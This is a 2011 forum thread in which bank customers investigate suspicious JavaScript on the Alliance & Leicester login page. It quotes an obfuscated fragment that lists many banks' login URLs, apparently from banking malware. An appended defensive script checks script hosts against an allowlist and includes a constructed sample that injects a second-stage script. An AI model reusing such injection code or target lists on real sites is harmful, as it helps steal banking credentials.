Do not login to A&L this morning - HACKED

edited 19 April 2011 at 8:01AM in Budgeting & Bank Accounts
61 replies 11.8K views

Replies

  • WUM anyone?
    Thinking critically since 1996....
  • ashleypride Forumite
    mattcodes wrote: »
    Update: I've had a response back from Santander PR team that they are investigating the issue.

    Thanks for letting us know. I don't quite understand why anybody would call you a spammer.
  • mattcodes Forumite
    edited 19 April 2011 at 9:10AM
    If anyone wants to follow the trail, take the JavaScript link from line 7 of the A&L login page, load it and paste it into jsbeautifier. This will reveal the second js file; paste that into jsbeautifier and you'll see something clearly malicious. I'm sorry it's not being reported yet.

    I think Santander/Abbey might be a different system but Santander/A&L is definitely affected
    WUM anyone?

    Sorry, nothing to gain from this. My account is with A&L and I don't want to see people at loss with this; in addition, I don't want it covered up either. If I'm a blagger you'll know for sure later today.
  • mr_fishbulb Forumite
    mattcodes wrote: »
    If anyone wants to follow the trail, take the JavaScript link from line 7 of the A&L login page, load it and paste it into jsbeautifier. This will reveal the second js file; paste that into jsbeautifier and you'll see something clearly malicious. I'm sorry it's not being reported yet.

    I think Santander/Abbey might be a different system but Santander/A&L is definitely affected

    Yes, all these different institutions listed in the code suggest something is afoot (and for once it's not my manhood!):
    http:\':\'V:\',x=\'allianceleicester\',k=\'18557\',l=\'v4.0\',m=\'ak\',n=Q,o=\'&U3=bankofamerica.7&U1=yahoo.7&U13=ebanking.W.7.hk/1/2/logon&U4=.abbeynational.9.E/EBAN_ENS/&U5=banking.firstdirect.7&U6=discovercard.7/cardmembersvcs/achome/homepage&U7=citibank&U9=.americanexpress.7/myca/acctsumm/us/&U2+U8=X.wellsfargo.7/das/Y-bin/session.Y&U12=halifax-X.9.E&U18=wachovia.7&Uo=banquepopulaire.fr/&U16=..de/Z/Z/&U11=.pncs.7.au/806015v47/&U21=ulsterbankanytimebanking./10.aspx&U15=ruralvia.7/10&U10=santander.cl/transa/segmentos/welcome.asp&U20=npbs.9.E&U14=coventrybuildingsociety.9.E&U17=.W.9.E/1/2/personal/&Uz21=/cmserver/verify.cfm&U19=.mybank.alliance-leicester
    
  • ashleypride Forumite
    mattcodes wrote: »
    If anyone wants to follow the trail, take the JavaScript link from line 7 of the A&L login page

    I was looking at the wrong site, but yes it's still there and certainly looks nefarious.
  • glider3560 Forumite
    I believe advanced-web-analytics.com is something to do with that Rapport software
  • mr_fishbulb Forumite
    glider3560 wrote: »
    I believe advanced-web-analytics.com is something to do with that Rapport software
    But what is polycache.com?
  • ashleypride Forumite
    But what is polycache.com?

    That is the question. From what I can tell, A&L do usually have the https://www.advanced-web-analytics.com/18557/splash.js code. So if anything has been compromised it is this server.
  • Is this right? I can see advancedwebanalytics in the RBS page as well?
  • Here's what I've just been told.

    While I am not able to go in to specifics regarding the activity, it appears the code was placed there willingly by the bank. Due to a misconfiguration these errors occurred. I was informed that the misconfiguration should be resolved and everything should be all set.
    Even if advanced-web-analytics is legit, I can't see how polycache is legit. On some of the nodes it presents a cert for gate-logic.com, is hosted in a Linode VPS, is registered anonymously, etc. I've saved copies of code to see what changes when they fix it.
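
The check the posters do by hand in this thread (reading which hosts the login page loads scripts from, then reading what the first script loads in turn) can be scripted for routine monitoring. This is an added example, not part of the original thread or any bank's code; the page URL, allowlist, markup and script body are constructed placeholders.

```javascript
// Constructed placeholders: page URL, allowlist, markup and script body.
const PAGE_URL = 'https://mybank.example/login';
const ALLOWED_HOSTS = new Set(['mybank.example', 'analytics.example']);

const SAMPLE_HTML = `
<html><head>
<script src="/static/app.js"></script>
<script type="text/javascript" src="https://analytics.example/t/tag.js"></script>
<script src='//cache.unknown.example/s.js'></script>
<script>var inline = 1;</script>
</head></html>`;

// Constructed first-stage script that injects a second-stage script.
const SAMPLE_STAGE1 =
  "var s=document.createElement('script');" +
  "s.src='https://cache.unknown.example/stage2.js';document.head.appendChild(s);";

// Resolve every <script src=...> against the page URL and return its host.
function scriptHosts(pageUrl, html) {
  const hosts = [];
  const re = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const raw = m[1] ?? m[2] ?? m[3];
    try {
      hosts.push(new URL(raw, pageUrl).hostname.toLowerCase());
    } catch (e) {
      hosts.push('(unparseable: ' + raw + ')'); // surface it, do not drop it
    }
  }
  return hosts;
}

// Hosts named by absolute or protocol-relative URLs inside script text.
function hostsInScriptText(js) {
  const re = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  const found = new Set();
  let m;
  while ((m = re.exec(js)) !== null) found.add(m[1].toLowerCase());
  return [...found];
}

// Any host not on the allowlist needs an owner and an explanation.
function unexpected(hosts, allowed) {
  return [...new Set(hosts)].filter((h) => !allowed.has(h));
}

console.log(unexpected(scriptHosts(PAGE_URL, SAMPLE_HTML), ALLOWED_HOSTS));
console.log(unexpected(hostsInScriptText(SAMPLE_STAGE1), ALLOWED_HOSTS));
```

Static scanning only sees URLs written out in plain text; a packed script like the one quoted above has to be unpacked first, which is what the jsbeautifier step in the thread is for.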



This discussion has been closed.